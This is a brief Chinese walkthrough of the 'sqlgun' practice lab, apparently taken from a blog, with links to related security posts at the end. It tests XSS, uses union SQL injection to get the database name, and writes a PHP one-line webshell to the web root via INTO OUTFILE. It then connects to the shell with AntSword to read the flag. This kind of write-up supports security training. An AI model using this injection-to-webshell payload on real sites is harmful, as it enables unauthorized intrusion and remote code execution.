sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POSTcmd); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
蒲公英eric4 小时前
从弱加密到安全实现:DVWA 密码学模块完整漏洞分析教程
安全·web安全·ai·dvwa·ai安全·密码学模块
Neighbor_OldY4 小时前
CSRF跨站请求伪造攻击检测与应急处置实战:伪造请求识别与防护落地
运维·安全·web安全
白猫不黑4 小时前
AI时代如何利用AI学好网络安全
人工智能·安全·web安全·计算机·网络安全·信息安全
佳&弥4 小时前
后渗透痕迹清理
服务器·windows·web安全·网络安全
砚凝霜15 小时前
【软考信息安全】第一章 网络安全基础、管理与法律法规
安全·web安全·php
三84419 小时前
SSRF 打内网 Redis:gopher 原理与实操
redis·web安全·bootstrap·ssrf
醉颜凉19 小时前
网络安全必学:粘性MAC地址(Sticky MAC)原理与应用全解析
运维·服务器·网络·安全·web安全
宁之明起(B服)21 小时前
vulhub靶场(log4shell)
web安全
迪康Defender1 天前
政企内网终端安全建设:资产‑管控‑防护‑审计闭环能力拆解
运维·网络·安全·web安全·终端安全管理